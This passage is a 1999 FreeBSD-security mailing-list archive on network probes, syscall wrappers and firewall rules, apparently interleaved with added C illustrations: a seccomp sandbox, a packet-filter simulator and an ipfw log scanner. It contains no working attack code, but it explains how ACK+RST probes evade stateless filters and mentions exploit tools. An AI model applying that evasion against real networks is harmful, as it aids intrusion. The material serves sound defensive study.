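#  define SECCOMP_RET_KILL_PROCESS SECCOMP_RET_KILL
#endif

/* Install the policy on the calling process: no execve/execveat; openat only
 * with a read-only access mode; everything else allowed. Denied calls fail
 * with EPERM rather than killing the process so the refusal is observable.
 * Returns 0 on success, -1 on failure. */
int drop_syscalls(void)
{
    struct sock_filter filt[] = {
        /* 0-2: refuse to run under a foreign ABI, whose syscall numbers differ */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, ARCH_NR, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        /* 3-8: dispatch on the syscall number */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_execve,   3, 0),  /* -> 8, deny  */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_execveat, 2, 0),  /* -> 8, deny  */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_openat,   2, 0),  /* -> 9, check */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
        /* 9-13: openat(dirfd, path, flags, ...): the low 32 bits of args[2]
         * are the flags on these little-endian ABIs; keep only the access
         * mode, which is Cliff's "parameter mask" */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args[2])),
        BPF_STMT(BPF_ALU | BPF_AND | BPF_K, O_ACCMODE),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, O_RDONLY, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof filt / sizeof filt[0]),
        .filter = filt,
    };

    /* no_new_privs is required before an unprivileged process may install a
     * filter; it also means a later setuid execve could not escape it. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

enum action { ACT_EXECVE, ACT_OPEN_WRITE, ACT_OPEN_READ };

/* Fork, confine the child, attempt one action there and report its verdict:
 * 0 = action succeeded, 2 = refused with EPERM, 1 = failed some other way,
 * 3 = the filter could not be installed, -1 = fork/wait error. */
int run_confined(enum action act)
{
    pid_t pid = fork();
    int status;

    if (pid < 0)
        return -1;
    if (pid == 0) {
        int rc = -1;
        if (drop_syscalls() != 0)
            _exit(3);
        if (act == ACT_EXECVE) {
            char *argv[] = { "true", NULL };
            execve("/bin/true", argv, NULL);    /* returns only on failure */
        } else {
            rc = openat(AT_FDCWD, "/dev/null",
                        act == ACT_OPEN_WRITE ? O_WRONLY : O_RDONLY);
        }
        _exit(rc >= 0 ? 0 : (errno == EPERM ? 2 : 1));
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("execve: %d, open for write: %d, open read-only: %d (2 = EPERM, 0 = allowed)\n",
           run_confined(ACT_EXECVE), run_confined(ACT_OPEN_WRITE), run_confined(ACT_OPEN_READ));
    return 0;
}
```

The inheritance property Thamer worried about is exactly how this behaves: the filter is copied to children on fork and survives execve, and a process can only add filters, never remove one. A truncate() or an openat with O_TRUNC in the flags is still possible under this policy, which is the open()-can-truncate gap Thamer named; closing it means masking O_TRUNC and O_CREAT too, and denying truncate/ftruncate by number.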
From: Jim Cassata
To: freebsd-security@freebsd.org
Subject: new type of attack?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I just received this....

> We have been tracking a long series of subtle network probes that
>use TCP packets constructed with ACK and RST bits set. This bit
>combination allows these packets to pass through common packet filters.
>The attackers have breached many systems around the net, focusing on
>Linux and FreeBSD systems. These breached systems are used to either
>receive directly or through packet sniffing the responses from forged
>packets sent by the attackers. On Sunday (5-9-99), we collected some
>probe packets from address 209.54.43.133. This host is called
>sex.fiend.cx and appears to be part of your network. There is a strong
>possibility that this host or one very near it has been breached and is
>being used to collect data probed from other networks. Our logs go back
>over a month and this is the first time this particular host has been
>seen on our network. The attackers seem to be able to move on to new
>systems very quickly as there are apparently plenty of vulnerable
>systems to breach. Our mail server was breached back in December and
>was used for similar activities for 2 days. The attackers created 2
>accounts, udp and reboot. The udp account had root privs and no
>password.
>
>The time of the probe was 14:05 CDT

Has anyone seen this kind of thing?
Jim Cassata 516.421.6000 jim@web-ex.com Web Express 20 Broadhollow Road Suite 3011 Melville, NY 11747 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 16: 9: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from vidnt2.hq.vid-h2o.org (vista2-blk1-hfc-0251-d1db0de8.rdc1.sdca.coxatwork.com [209.219.13.232]) by hub.freebsd.org (Postfix) with ESMTP id 8573815234 for ; Tue, 11 May 1999 16:09:01 -0700 (PDT) (envelope-from JDoscher@vid-h2o.org) Received: by VIDNT2 with Internet Mail Service (5.5.2232.9) id ; Tue, 11 May 1999 16:11:55 -0700 Message-ID: 
From: Jay Doscher
To: 'Jim Cassata'
Cc: "'freebsd-security@FreeBSD.ORG'"
Subject: RE: new type of attack?
Date: Tue, 11 May 1999 16:10:59 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2232.9)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I experienced this kind of attack on a Redhat Linux 5.1 machine that had not been patched. My experience was that the attacker was using a set of tools such as cracker.pl and queso (a port redirector) in a script that scanned a subnet for slackware or redhat machines that were unpatched against the mountd exploit. The scripts run and when they find a machine whose IP stack matches one of these OSes it attempts to run the mountd exploit; after it does, it proceeds to root the machine and run cracker.pl against all the other accounts. I received several complaints of scans and probes from this box against other sysadmins. I traced the IP back to an ISP who, when notified, found one of his routers had been compromised and was propagating a spoofed IP (or running NAT, I dunno) without his knowledge. The script seems to exploit a machine, then use that machine as a springboard to launch further attacks. I know this isn't a BSD issue, but I think it would explain the probes.

Jay

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Jim Cassata
Sent: Tuesday, May 11, 1999 3:58 PM
To: freebsd-security@FreeBSD.ORG
Subject: new type of attack?

I just received this....

> We have been tracking a long series of subtle network probes that
>use TCP packets constructed with ACK and RST bits set. This bit
>combination allows these packets to pass through common packet filters.
>The attackers have breached many systems around the net, focusing on
>Linux and FreeBSD systems. These breached systems are used to either
>receive directly or through packet sniffing the responses from forged
>packets sent by the attackers. On Sunday (5-9-99), we collected some
>probe packets from address 209.54.43.133. This host is called
>sex.fiend.cx and appears to be part of your network. There is a strong
>possibility that this host or one very near it has been breached and is
>being used to collect data probed from other networks. Our logs go back
>over a month and this is the first time this particular host has been
>seen on our network. The attackers seem to be able to move on to new
>systems very quickly as there are apparently plenty of vulnerable
>systems to breach. Our mail server was breached back in December and
>was used for similar activities for 2 days. The attackers created 2
>accounts, udp and reboot. The udp account had root privs and no
>password.
>
>The time of the probe was 14:05 CDT

Has anyone seen this kind of thing?
Jim Cassata 516.421.6000 jim@web-ex.com Web Express 20 Broadhollow Road Suite 3011 Melville, NY 11747 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 17:35:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id DBCB114E04 for ; Tue, 11 May 1999 17:35:09 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id RAA80884; Tue, 11 May 1999 17:35:02 -0700 (PDT) (envelope-from dillon) Date: Tue, 11 May 1999 17:35:02 -0700 (PDT) 
From: Matthew Dillon
Message-Id: <199905120035.RAA80884@apollo.backplane.com>
To: Jim Cassata
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: new type of attack?
References:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:I just received this....
:
:> We have been tracking a long series of subtle network probes that
:>use TCP packets constructed with ACK and RST bits set. This bit
:>combination allows these packets to pass through common packet filters.
:>The attackers have breached many systems around the net, focusing on
:>Linux and FreeBSD systems. These breached systems are used to either
:>receive directly or through packet sniffing the responses from forged
:>packets sent by the attackers. On Sunday (5-9-99), we collected some
:>probe packets from address 209.54.43.133. This host is called
:>sex.fiend.cx and appears to be part of your network. There is a strong
:>possibility that this host or one very near it has been breached and is
:>being used to collect data probed from other networks. Our logs go back
:>over a month and this is the first time this particular host has been
:>seen on our network. The attackers seem to be able to move on to new
:>systems very quickly as there are apparently plenty of vulnerable
:>systems to breach. Our mail server was breached back in December and
:>was used for similar activities for 2 days. The attackers created 2
:>accounts, udp and reboot. The udp account had root privs and no
:>password.
:>
:>The time of the probe was 14:05 CDT
:
:Has anyone seen this kind of thing?
:
:Jim Cassata
:
:516.421.6000
:jim@web-ex.com
:
:Web Express
:20 Broadhollow Road
:Suite 3011
:Melville, NY 11747

The network probe idea sounds interesting. The breach in this person's mail server is probably the long-since-fixed root exploit in popper and imapd... if he is still getting broken into, he is running out-of-date software. The two are entirely separate issues.
					-Matt
					Matthew Dillon

From owner-freebsd-security Tue May 11 19:29:19 1999
To: Matthew Dillon
Cc: Jim Cassata, freebsd-security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: new type of attack?
In-reply-to: Your message of "Tue, 11 May 1999 17:35:02 PDT." <199905120035.RAA80884@apollo.backplane.com>
Date: Tue, 11 May 1999 22:29:04 -0400
Message-ID: <77332.926476144@noop.colo.erols.net>

Matthew Dillon wrote in message ID <199905120035.RAA80884@apollo.backplane.com>:

> The network probe idea sounds interesting. The breach in this person's

The scan sounds like something nmap would do.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Tue May 11 23:52:10 1999
From: Darren Reed
Message-Id: <199905120651.QAA05838@cheops.anu.edu.au>
Subject: Re: Wrapping syscalls
To: shadows@whitefang.com (Thamer Al-Herbish)
Date: Wed, 12 May 1999 16:51:27 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "Thamer Al-Herbish" at May 11, 99 02:29:02 pm

In some mail from Thamer Al-Herbish, sie said:
>
> On Wed, 12 May 1999, Darren Reed wrote:
>
> > Logging would be interesting, as would write'ing data to be sent
> > back to the client :-) Let's hope they're not interested in using
> > CGI either :-)
>
> You would need some granularity I suppose. Just looked at the TIS
> post, it's been done and done well it seems.

TIS post ?

> > This isn't a capability based solution in the traditional sense of
> > that term, more of a means being able to deny yourself use of certain
> > system calls.
>
> Absolutely not. What you described is somewhat like a product from Axent.

Capabilities are not tied to system calls, system calls just provide a
user interface to them.

Darren

From owner-freebsd-security Wed May 12 2:34: 2 1999
Date: Wed, 12 May 1999 05:33:02 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Darren Reed
Cc: security@freebsd.org
Subject: Generic Software Wrappers (fwd)

Since there have been a few questions about the reference I made to wrappers
code from TIS, I'm forwarding the original mailing list announcement back to
the list. Note: just because my .sig says TIS doesn't mean I know anything
much about this particular project. :)

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

---------- Forwarded message ----------
Date: Thu, 08 Apr 1999 17:17:35 -0400
From: Mark S Feldman
To: freebsd-security@freebsd.org
Cc: feldman@tislabs.com
Subject: Generic Software Wrappers

Almost 8 months back, I responded to a message on this list and described a
research project we were working on. My message is below. At the end of the
message, I said I would send another message to this list when we made our
source available.

Well, the first release of our Generic Software Wrappers Tool Kit -- still
very much a research prototype -- is available. It runs under FreeBSD 2.2.x,
Solaris 2.6, and, as much as we have ported to date, under Windows NT 4.0.
We're limited to FreeBSD 2.2.x because we don't currently have the resources
to port to 3.x.

Check out ftp://ftp.tislabs.com/pub/wrappers if you're interested.

Mark

------- Forwarded Message

To: Philippe Regnauld
cc: freebsd-security@freebsd.org, badger@tis.com, feldman@tis.com, Robert Watson
Subject: Re: Fwd: "Using capabilties aaginst shell code" (fwd)
Date: Wed, 19 Aug 1998 11:14:17 -0400
From: Mark S Feldman

Philippe,

Your message to the freebsd-security list was passed to me. I'm the project
leader for the Generic Software Wrappers project at TIS Labs at Network
Associates. In short, under DARPA contract F30602-96-C-0333, we have
developed a Wrapper Definition Language (WDL) based on 'C' which makes it
easy to identify system events of interest (e.g., named system calls, all
system calls containing a path parameter, system calls available only to
root), to intercept them, and to deny, augment, or transform those events.
We have developed a prototype under FreeBSD, including a wrapper compiler
which compiles WDL into 'C', a Wrapper Support Subsystem implemented as a
Loadable Kernel Module, and various support programs. We are currently
porting to Solaris and Windows NT. Our source is not currently organized
for distribution, but, once it is, it will be made available for free for
non-commercial use.

> Is this any form of restriction that can be implemented
> in *BSD systems ? I.e.: restricting system calls to
> certain classes of daemons ?

One of our simpler wrappers is the noadmin wrapper, which prevents a wrapped
process, even one running as root, from executing certain administrative
system calls:

/*
 * $Id: noadmin.wr,v 1.5 1998/04/20 19:05:08 ko Exp $
 *
 * noadmin.wr
 *
 * A wrapper that denies certain administrative syscalls.
 */

#include "../../wr.include/bsd.ch"

wrapper noadmin {
    bsd::op{mount || unmount || ptrace || quotactl || acct || swapon ||
            mknod || adjtime || ktrace || reboot || settimeofday} pre {
        return WR_DENY | WR_BADPERM;
    };
}

In the wrapper, bsd.ch contains a characterization of the system API. It
starts with the 'C' prototype, and then adds additional attributes that make
it possible to group system calls and to deal with their parameters. The
wrapper runs in the bsd domain and looks for the named operations.
It intercepts before the operation occurs (pre keyword), prevents it from
executing, making it appear to be a permission denied-type error.

> As mentioned in the example below, why should POPd be allowed
> to exec() ? This seems like a very sane approach (of course,
> it implies knowledge/auditing of the code).

In addition to our wrappers, which specify what events to look for and how
to handle them, we have activation criteria, which determine which wrappers
wrap a process. Activation criteria are simple boolean expressions which can
be based on the uid, gid, program name, etc. If the pop daemon were named
popd, the following activation criteria would cause it to be wrapped by the
noadmin wrapper:

    prog == popd ==> noadmin

As for not knowing what system calls a process needs to get the job done, it
could first be run under a wrapper like dbcallcount, which tracks all system
calls made by wrapped processes and uses Wrapper Query Language (WQL) to
store call counts in our fast, lightweight database which can be viewed
using our GUI or CLI from user space:

/*
 * $Id: dbcallcount.wr,v 1.7 1998/08/06 19:45:17 ko Exp $
 *
 * dbcallcount.wr
 *
 * This wrapper keeps track of the number of times each syscall is
 * attempted.
 *
 * Use the "wrselect" program to view the tables created.
 *
 */

#include "../../wr.include/bsd.ch"
#include "../../wr.include/libwr.h"

wrapper dbcallcount {
    DBTABLE callcountTable {
        char(20) key name;
        int count;
    };

    callcountTable callcount;

    wr_activate() {
        int i;

        /* create the table. */
        i = wql { create table callcount; };
        if (i < 0)
            wr_printf("Error creating table.\n");
    }

    wr_duplicate() {
        /* create the table. */
        wql { create table callcount; };
    }

    wr_deactivate() {
        /* Drop the table. */
        wql { drop table callcount; };
    }

    /* Catch all syscalls */
    bsd::op{*} pre {
        int retVal;

        /* If syscall is in the db, increment count. */
        /* If not, add the syscall to the database.
         */
        retVal = wql { update callcount set .count = .count + 1 where .name = $$; };
        if (retVal <= 0) {
            wql { insert into callcount values ($$, 1); };
        }
    };
}

>
> Then we could have certain untrusted (i.e.: running as
> root) daemons launched in such an environment, on top
> of being chroot()ed. ...

Yup. And wrappers provide a mechanism to do that. Take a look at the
following wrapper which creates a simple, if silly, synthetic environment:

/*
 * $Id: dbsynthetic.wr,v 1.5 1998/08/19 15:30:08 feldman Exp $
 *
 * This wrapper provides a synthetic environment, doing string
 * substitutions on path names.
 *
 */

#include "../../wr.include/bsd.ch"
#include "../../wr.include/libwr.h"

wrapper dbsynthetic {
    /* Null-terminated array of substitution string pairs. Each target
     * entry, if found in a path, will be replaced by the replacement
     * entry. Regular expressions, as defined in WDL, can be used for
     * the targets.
     */
    DBTABLE path_table {
        char(256) target;
        char(256) replacement;
    };

    DBTABLE alert_table {
        char(256) path;
        char(256) fullname;
        int pid;
        int uid;
    };

    path_table global pathnames;
    alert_table global alerts;

    wr_install() {
        DBROW::path_table row;

        wql {
            create table pathnames;
            create table alerts;
            insert into pathnames values
                ( "/etc/master.passwd", "/etc/passwd"),
                ( "/kernel", "/etc/motd"),
                ( "/lkm", "/tmp"),
                ( "/usr/games", "/usr/bin"),
                ( "/usr/tmp", "/tmp"),
                ( "/var/tmp", "/tmp")
            ;
            select into row from pathnames;
        };
    }

    wr_uninstall() {
        wql {
            drop table pathnames;
            drop table alerts;
        };
    }

    /* Intercept all syscalls containing paths before they run */
    bsd::pattr{path} pre {
        DBROW::path_table row;
        string fullname;
        int changed = 0;

        /* Attempt to convert path from relative to absolute. If
         * the conversion doesn't succeed, it's a bad path.
         * This would normally be the end, but since we may be
         * redirecting from a non-existent path to one that exists,
         * we'll proceed
         */
        if ((fullname = wr_abspath($path)) == NULL) {
            fullname = wr_strdup($path);
        }

        wql { select into row from pathnames; };

        do {
            /* Do string substitutions for each pair of pathnames
             * and remember if any occurred.
             */
            if (fullname =~ s|row.target|row.replacement|)
                changed++;
        } while (row.next());

        /* Write out an alert to the database and change the path
         * parameter if any substitutions occurred.
         */
        if (changed) {
            wql { insert into alerts values ($path, fullname, _pid, _uid); };
            $path = fullname;
        }

        /* Cleanup */
        wr_free(fullname);
    };
}

My response is undoubtedly way too long. I'll make sure that a message is
sent to this list when we make our source available. In the mean time, if
you have any questions, let me know.

Mark

- -----
Mark S. Feldman                    TIS Labs at Network Associates, Inc.
phone: +1 301 854 6889             3060 Washington Road
fax:   +1 301 854 5363             Glenwood, Maryland 21738

------- End of Forwarded Message

From owner-freebsd-security Wed May 12 7: 7: 9 1999
Message-Id: <199905121406.HAA09671@cwsys.cwsent.com>
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 2.2.8-RELEASE
To: Jim Cassata
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: new type of attack?
In-reply-to: Your message of "Tue, 11 May 1999 18:57:38 EDT."
Date: Wed, 12 May 1999 07:06:39 -0700

In message , Jim Cassata writes:
> i just received this....
>
> > We have been tracking a long series of subtle network probes that
> >use TCP packets constructed with ACK and RST bits set. This bit
> >combination allows these packets to pass through common packet filters.
> >The attackers have breached many systems around the net, focusing on
> >Linux and FreeBSD systems. These breached systems are used to either
> >receive directly or through packet sniffing the responses from forged
> >packets sent by the attackers. On Sunday (5-9-99), we collected some
> >probe packets from address 209.54.43.133. This host is called
> >sex.fiend.cx and appears to be part of your network. There is a strong
> >possibility that this host or one very near it has been breached and is
> >being used to collect data probed from other networks. Our logs go back
> >over a month and this is the first time this particular host has been
> >seen on our network. The attackers seem to be able to move on to new
> >systems very quickly as there are apparently plenty of vulnerable
> >systems to breach. Our mail server was breached back in December and
> >was used for similar activities for 2 days. The attackers created 2
> >accounts, udp and reboot. The udp account had root privs and no
> >password.
> >
> >The time of the probe was 14:05 CDT
>
> has anyone seen this kind of thing?

A lot of this depends on how well your packet filter rules are structured to
mitigate the effectiveness of this kind of probing.
Disallowing all outgoing sessions (any and all sessions), except through a
bastion host on a DMZ, would be the best approach. The other approach would
be to place the rules that allow outgoing packets with SYN at the end of the
rule list prior to the global deny rule. All of this would, of course,
depend on the rules prior to the last few rules. In other words there is no
band-aid solution. Your rules need to be carefully thought out and in a
sequence that will make each one effective, especially the last ones.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Open Systems Group             Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                      Cy.Schubert@gems8.gov.bc.ca
Province of BC
                               "e**(i*pi)+1=0"

From owner-freebsd-security Wed May 12 17:24:19 1999
Date: Wed, 12 May 1999 19:14:21 -0500
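Both the forwarded alert ("ACK and RST bits set ... pass through common packet filters") and Cy's ordering advice turn on how a stateless filter decides what counts as an existing session. The following C program is an added illustration, not code from anyone in this thread: it models ipfw-style first-match evaluation with the `setup` and `established` keywords (which, with no connection table, mean "SYN without ACK" and "RST or ACK set"), then runs an ACK+RST segment through a common ruleset and through one built along the lines Cy describes. The host names `bastion`, `internal-host`, `probe-src`, `remote` and both rule lists are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* TCP flag bits as in <netinet/tcp.h>, redefined so the file stands alone. */
enum { TH_SYN = 0x02, TH_RST = 0x04, TH_ACK = 0x10 };
enum dir     { DIR_IN, DIR_OUT, DIR_ANY };
enum verdict { PASS, DROP };
/* ipfw's stateless TCP keywords: "setup" is SYN without ACK, "established"
 * is any segment carrying RST or ACK. Nothing here remembers real sessions. */
enum tcpstate { ST_ANY, ST_SETUP, ST_ESTABLISHED };

struct pkt  { enum dir dir; int flags; const char *src; const char *dst; };
struct rule { enum dir dir; enum tcpstate st; const char *src; const char *dst; enum verdict v; };

static int host_match(const char *pat, const char *host)
{
    return strcmp(pat, "any") == 0 || strcmp(pat, host) == 0;
}

static int state_match(enum tcpstate st, int flags)
{
    switch (st) {
    case ST_SETUP:       return (flags & TH_SYN) && !(flags & TH_ACK);
    case ST_ESTABLISHED: return (flags & (TH_RST | TH_ACK)) != 0;
    default:             return 1;
    }
}

/* Rules are tried in order and the first match decides, as ipfw does. */
enum verdict filter(const struct rule *rules, int nrules, const struct pkt *p)
{
    int i;
    for (i = 0; i < nrules; i++) {
        const struct rule *r = &rules[i];
        if ((r->dir == DIR_ANY || r->dir == p->dir) &&
            state_match(r->st, p->flags) &&
            host_match(r->src, p->src) && host_match(r->dst, p->dst))
            return r->v;
    }
    return DROP;    /* implicit deny if nothing matched */
}

#define NRULES(a) ((int)(sizeof(a) / sizeof((a)[0])))

/* Ruleset A: the "common packet filter" of the alert. Any segment with ACK
 * or RST set is taken to belong to a session someone inside opened. */
const struct rule common_rules[] = {
    { DIR_ANY, ST_ESTABLISHED, "any", "any", PASS },
    { DIR_OUT, ST_SETUP,       "any", "any", PASS },
    { DIR_ANY, ST_ANY,         "any", "any", DROP },
};

/* Ruleset B, following Cy's advice: internal hosts never open sessions, only
 * the bastion host on the DMZ does, so no inbound segment can legitimately be
 * a reply to an internal host. The outgoing-SYN rule sits just before the
 * final deny. */
const struct rule bastion_rules[] = {
    { DIR_IN,  ST_ESTABLISHED, "any",     "bastion", PASS },
    { DIR_OUT, ST_ESTABLISHED, "bastion", "any",     PASS },
    { DIR_OUT, ST_SETUP,       "bastion", "any",     PASS },
    { DIR_ANY, ST_ANY,         "any",     "any",     DROP },
};

/* Constructed packets with hypothetical host names. */
const struct pkt ackrst_probe  = { DIR_IN,  TH_ACK | TH_RST, "probe-src", "internal-host" };
const struct pkt inbound_syn   = { DIR_IN,  TH_SYN,          "probe-src", "internal-host" };
const struct pkt bastion_setup = { DIR_OUT, TH_SYN,          "bastion",   "remote" };
const struct pkt bastion_reply = { DIR_IN,  TH_SYN | TH_ACK, "remote",    "bastion" };

static void show(const char *set, const struct rule *r, int n, const char *what, const struct pkt *p)
{
    printf("%-8s %-18s -> %s\n", set, what, filter(r, n, p) == PASS ? "PASS" : "DROP");
}

int main(void)
{
    show("common",  common_rules,  NRULES(common_rules),  "ACK+RST probe",    &ackrst_probe);
    show("common",  common_rules,  NRULES(common_rules),  "inbound SYN",      &inbound_syn);
    show("bastion", bastion_rules, NRULES(bastion_rules), "ACK+RST probe",    &ackrst_probe);
    show("bastion", bastion_rules, NRULES(bastion_rules), "bastion setup",    &bastion_setup);
    show("bastion", bastion_rules, NRULES(bastion_rules), "reply to bastion", &bastion_reply);
    return 0;
}
```

With the common rules the ACK+RST segment passes on the `established` rule although no session exists, while a plain inbound SYN is dropped; that asymmetry is the whole reason the probe is built that way. The bastion rules drop it because nothing inside was ever allowed to open a session, so there is no reply to let through. A stateful filter (ipfw's later `keep-state` rules) is the other way out; this sketch deliberately keeps no state so the weakness is visible.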
From: Jamie Rishaw
To: "Jordan K. Hubbard"
Cc: Mike Smith, Seth, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
Message-ID: <19990512191420.A12813@rage.arpa.com>
References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com>
In-Reply-To: <30986.925789368@zippy.cdrom.com>; from Jordan K. Hubbard on Mon, May 03, 1999 at 08:42:48PM -0700

Problem: FreeBSD kernel panics under SYN attack.

Solution seems to be modifying:

net.inet.ip.rtexpire: 12
net.inet.ip.rtminexpire: 10

Discuss.

-jamie

From owner-freebsd-security Wed May 12 18: 9:47 1999
Message-ID: <000201be9cdd$46a868a0$6f00000a@domain.pentalpha.com.hk>
From: "danny"
Subject: network scan?
Date: Thu, 13 May 1999 09:05:42 +0800

I found the following from the log file. What are those people doing?

May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0
May 12 18:42:27 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0
May 12 18:42:27 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4401 a.b.c.15:1080 in via ed0
May 12 18:42:30 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4401 a.b.c.15:1080 in via ed0
May 12 23:49:19 server /kernel: ipfw: 26000 Deny TCP 202.103.173.116:4196 a.b.c.1:1080 in via ed0
May 12 23:49:20 server /kernel: ipfw: 26000 Deny TCP 202.103.173.116:4210 a.b.c.15:1080 in via ed0

danny

From owner-freebsd-security Wed May 12 19:22:57 1999
Date: Wed, 12 May 1999 19:22:51 -0700 (PDT)
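As an added example (not from danny's post or anyone else in the thread), here is a small C program that parses ipfw log lines of the form danny posted and flags any source that hit the same port on several hosts, which is what a port sweep looks like in the firewall log. The sample lines are constructed: danny's six Deny lines plus three Unreach UDP lines in the same format that are quoted elsewhere in this thread, with made-up timestamps. The port labels (1080 for SOCKS, 161 for SNMP, 137-139 for NetBIOS) are the standard service assignments, not something the log itself states.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One parsed ipfw log record. */
struct ipfw_entry {
    int  rule, src_port, dst_port;
    char action[16], proto[8], src_host[64], dst_host[64];
};

/* Split "host:port"; returns 0 if there is no port part or the host is too long. */
static int split_endpoint(const char *ep, char *host, size_t hostlen, int *port)
{
    const char *colon = strrchr(ep, ':');
    size_t n;
    if (colon == NULL || colon == ep || (n = (size_t)(colon - ep)) >= hostlen)
        return 0;
    memcpy(host, ep, n);
    host[n] = '\0';
    *port = atoi(colon + 1);
    return 1;
}

/* Parse a line like
 *   May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0
 * Returns 1 and fills *e, or 0 if the line is not an ipfw record. */
int parse_ipfw_line(const char *line, struct ipfw_entry *e)
{
    const char *p = strstr(line, "ipfw: ");
    char src[80], dst[80];
    if (p == NULL)
        return 0;
    if (sscanf(p + 6, "%d %15s %7s %79s %79s", &e->rule, e->action, e->proto, src, dst) != 5)
        return 0;
    return split_endpoint(src, e->src_host, sizeof e->src_host, &e->src_port) &&
           split_endpoint(dst, e->dst_host, sizeof e->dst_host, &e->dst_port);
}

/* Label the record by the service normally found on the destination port. */
const char *classify(const struct ipfw_entry *e)
{
    if (e->dst_port == 1080)
        return "SOCKS proxy probe";
    if (e->dst_port == 161)
        return "SNMP probe";
    if (strcmp(e->proto, "UDP") == 0 && e->src_port >= 137 && e->src_port <= 139 &&
        e->dst_port >= 137 && e->dst_port <= 139)
        return "NetBIOS port-13x-to-13x noise";
    return "unclassified";
}

/* Parse and classify one line in a single call. */
const char *classify_line(const char *line)
{
    struct ipfw_entry e;
    return parse_ipfw_line(line, &e) ? classify(&e) : "not an ipfw record";
}

static int same_pair(const struct ipfw_entry *a, const struct ipfw_entry *b)
{
    return strcmp(a->src_host, b->src_host) == 0 && a->dst_port == b->dst_port;
}

/* Report every (source host, destination port) pair that reached at least
 * min_hosts distinct destination hosts, i.e. one source sweeping a port across
 * the network. Returns the number of such pairs. */
int count_scanners(const char *const *lines, int nlines, int min_hosts)
{
    struct ipfw_entry ents[64];
    int n = 0, i, j, k, found = 0;

    for (i = 0; i < nlines && n < 64; i++)
        if (parse_ipfw_line(lines[i], &ents[n]))
            n++;
    for (i = 0; i < n; i++) {
        int hosts = 0;
        for (j = 0; j < i && !same_pair(&ents[j], &ents[i]); j++)
            ;
        if (j < i)
            continue;                     /* pair already handled at an earlier i */
        for (j = 0; j < n; j++) {         /* count distinct destination hosts */
            if (!same_pair(&ents[j], &ents[i]))
                continue;
            for (k = 0; k < j; k++)
                if (same_pair(&ents[k], &ents[i]) && strcmp(ents[k].dst_host, ents[j].dst_host) == 0)
                    break;
            if (k == j)
                hosts++;
        }
        if (hosts >= min_hosts) {
            found++;
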